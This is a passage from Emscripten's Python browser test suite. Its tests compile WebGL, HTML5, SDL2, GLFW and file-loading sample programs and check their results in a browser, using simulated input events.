'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(path_from_root('tests', 'test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(path_from_root('tests', 'browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(path_from_root('tests', 'third_party', 'notofont', 'NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2'])
@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])
def test_sdl2_misc_via_object(self):
self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
